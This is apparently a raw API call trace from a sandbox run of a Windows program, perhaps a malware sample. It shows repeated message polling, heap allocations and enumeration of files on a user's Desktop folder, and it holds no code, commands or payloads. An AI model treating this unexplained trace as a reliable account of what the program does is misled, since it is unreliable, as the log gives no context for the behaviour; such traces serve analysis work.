lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.764] lstrlenW (lpString="20") returned 2 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] lstrlenW (lpString="20") returned 2 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] lstrlenW (lpString="34") returned 2 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] lstrlenW (lpString="20") returned 2 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] lstrlenW (lpString="20") returned 2 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.765] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="31") returned 2 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="20") returned 2 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="20") returned 2 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="32") returned 2 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="20") returned 2 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="20") returned 2 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.766] lstrlenW (lpString="34") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] lstrlenW (lpString="20") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] lstrlenW (lpString="20") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] lstrlenW (lpString="34") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] lstrlenW (lpString="20") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] lstrlenW (lpString="20") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] lstrlenW (lpString="31") returned 2 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.767] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] lstrlenW (lpString="20") returned 2 [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] lstrlenW (lpString="7C") returned 2 [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.768] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0083.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x29f1998, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0083.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0083.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop", cchWideChar=24, lpMultiByteStr=0x29f7020, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop", lpUsedDefaultChar=0x0) returned 24 [0083.772] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.772] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0083.814] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1aa0 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1980 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720b8 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f18f0 [0083.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720b8 | out: hHeap=0x2af0000) returned 1 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1998 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720b8 [0083.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1a70 [0083.814] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720b8 | out: hHeap=0x2af0000) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1890 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720b8 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1848 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1a88 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0083.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f70c0 [0083.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f70c0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0083.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1848 | out: hHeap=0x2af0000) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d898 [0083.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a683a8 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f18a8 [0083.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0083.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0083.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a722f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0083.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1a88 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f18a8 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d898 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1890 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720b8 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f18f0 | out: hHeap=0x2af0000) returned 1 [0083.817] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1980 | out: hHeap=0x2af0000) returned 1 [0083.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1a70 | out: hHeap=0x2af0000) returned 1 [0083.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1998 | out: hHeap=0x2af0000) returned 1 [0083.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1aa0 | out: hHeap=0x2af0000) returned 1 [0083.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.818] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720b8 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1980 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f18d8 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0083.818] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1920 [0083.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0083.818] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1920 | out: hHeap=0x2af0000) returned 1 [0083.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f18d8 | out: hHeap=0x2af0000) returned 1 [0083.819] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1980 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720b8 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.820] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f18f0 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1890 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720b8 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1a70 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1a88 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0083.820] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1a88 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.820] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720b8 | out: hHeap=0x2af0000) returned 1 [0083.820] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x25c9f900, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x98f7c8 [0083.860] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x25c9f900, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0083.860] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0083.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0083.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1848 [0083.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720b8 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69a00 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 